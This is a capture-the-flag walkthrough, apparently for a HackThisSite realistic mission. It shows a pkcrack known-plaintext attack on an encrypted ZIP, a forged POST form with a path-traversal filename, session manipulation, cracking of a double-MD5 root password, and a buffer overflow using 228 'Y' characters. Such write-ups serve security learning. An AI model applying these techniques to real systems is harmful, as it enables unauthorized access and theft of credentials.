BUFFER OVERFLOW, COOKIE MANUPULATION , ZIP & HASH CRACKING
I don’t have too much time for writing up tutorials .I will try to come back to improve this article later. The point is
I heard about him, he is one the kind who locks the front door twice and leaves the back-door open.
I really don’t know what this good sounding point mean. The method is similar like the previous ones. But many of the methods’ implementation makes this mission really hard. We study the source code and found this following link.’
Download the file backup.zip from there. You can open the zip and view the filenames but you cannot extract it as it is password protected. But luckily, for every problem, there is a solution. This is where pkcrack comes in. so you downloaded pkcrack, good. What pkcrack does, is it is a plaintext attacker (feel free to correct me if that is not the correct term). That basically means that to crack the ZIP, it needs at least one of the files that is in the ZIP in its original form (unencrypted obviously). So, with that in mind, open the ZIP in winzip or whatever and see what you can find. Well, looky here! The file “index.htm”in there that is available in its original form. Great, problem just got a lot less tricky. So goto
And and go to File -> Save/Save Page As -> and save it. I don’t know about Internet Explorer, but for Firefox, you need to save it as “Web page, HTML only”, not “Web page, complete”. The size of the file should be exactly 4423 bytes. If it is not, you did something wrong. Just keep on saving the page in a different way. Come on people, its not so hard to save a web page :p. You can also try using wget, although I don’t really like it.
OK, so now you have the page saved in the correct size. Now comes the tricky part. You need to compress the file you downloaded to 1245 bytes exactly. I know this is the part where many of you are stuck at. So, go ahead and compress it.
What I used: Winace v2.65
You compress it using the normal compression (please don’t remove this admins, it has been said in the forums many times), and you also need to change the encryption method. Try them all, there aren’t that many.
Now, an important note: Every time you compressed the file and want to check the size, do NOT check the file size in properties, open it in Winzip or Winace or whatever, and check it in there. This part is so simple, but it had me stuck for a while.
Now that you have the file ZIPed to the correct size (1245), we can continue with pkcrack. First, put the ZIPed file and the backup.zip in the pcrack folder. Now go to cmd, and cd your way to the pkcrack folder. now, type pkrack and hit enter. You will see the syntax you need to use. To get a better explanation, read the pkcrack manual. It is in the doc folder. Still in cmd, type:
|-C passwordprotectedzip –c thefileinthezipthatyouhavedownloadedfromthesite –P theplaintextzip –p thefileinthezipthatyouhavezippedto1245bytes –d Unzipped.zip -*|
Here goes the details
|-C is the password protected ZIP file (backup.zip).
-c is the file in the ZIP file that is available in plaintext format (index.htm).
-P is the ZIP containing the file ZIPed to 1245 bytes.
-p is the file in the plaintext ZIP ZIPed to 1245 bytes
-d is the decrypted ZIP file that pkcrack will create if it cracks the encrypted ZIP successfully.
-* the * represents a character.
to find out which one, read your pkcrack manual. This is a very important function. Without it I couldn’t unzip the ZIP. Ok here is the spoiler
|pkcrack –C backup.zip –c “misc (files from different folders)/index.htm” -P index.zip -p index.htm –d result.zip –a –i|
I saved the index.htm and compressed it named ndex.zip. Now the results.zip is created and just extract it. We get a folder “ internal_messages ” which contain “ internal_messages.php”, so we head to
Now while in the source code of index.htm we get the name of the web-admin in the meta tag.
|< meta name=”Author” content=”webadmin: Susy Slack, email firstname.lastname@example.org”>|
Now create a HTML page with this code below:
|<form action=”http://www.hackthissite.org/missions/realistic/15/internal_messages/msgauth.php” method=”POST”>
<input name=”msg_password” value=”Susy Slack,” type=text>
<input name=”msg_username” value=”admin” type=text>
<input name=”filename” value=”../../index.htm” type=text>
<input type=”submit” value=”send”>
and submit and you get “set admin OK” which means you have your $_SESSION set to “OK” right, well go ahead and read the admin’s message. and so we again head to
and enter admin password “Susy Slack” and read the message:
I added a more secure authentication-check script in the admin_area directory, and I stored a file with the source-code there. Check it if you want to. You will see its ultra secure.
Top of Form
Bottom of Form
And so we now go to
Its showing forbidden and here comes the name of our another decrypted file “shell.php”
Now put the following as username and password:
|User name : $fromEmail|
Leave the password field blank and press ok. It will show you an error and hence refresh the page and enter to the following:
|User name : fromEmail|
Leave the password field blank and again press ok. It will show you an error and hence refresh again the page and enter to the following:
|User name : shellPswd_root|
and it will give you a double MD5 hash which means when you crack the MD5 it will give you another MD5 and hence you have to again crack it and you will get the password as “foobar”. Now hit refresh and enter
|User name : root
And you’re in. And it’s a Linux terminal .Type “ls”to list the directory file names. Now you see two files in admin_area named “test” and “viewpatents.php”.Goto
Download the file “chkuserpass.c.zip” and hence you founded the special character needed “Y” to overflow the buffer in the login page as when you study the C program in the zip file you will the following bit of program
|if (strcmp(mymd5(concatenated), hash) == 0)
is_pass_correct = ‘Y’;
Now goto the page :
So enter capital “Y” in the username section and click “submit” leaving the password field blank. It will do the buffer overflow. We started bruteforce from 200 Y and found that 228 Y works here perfectly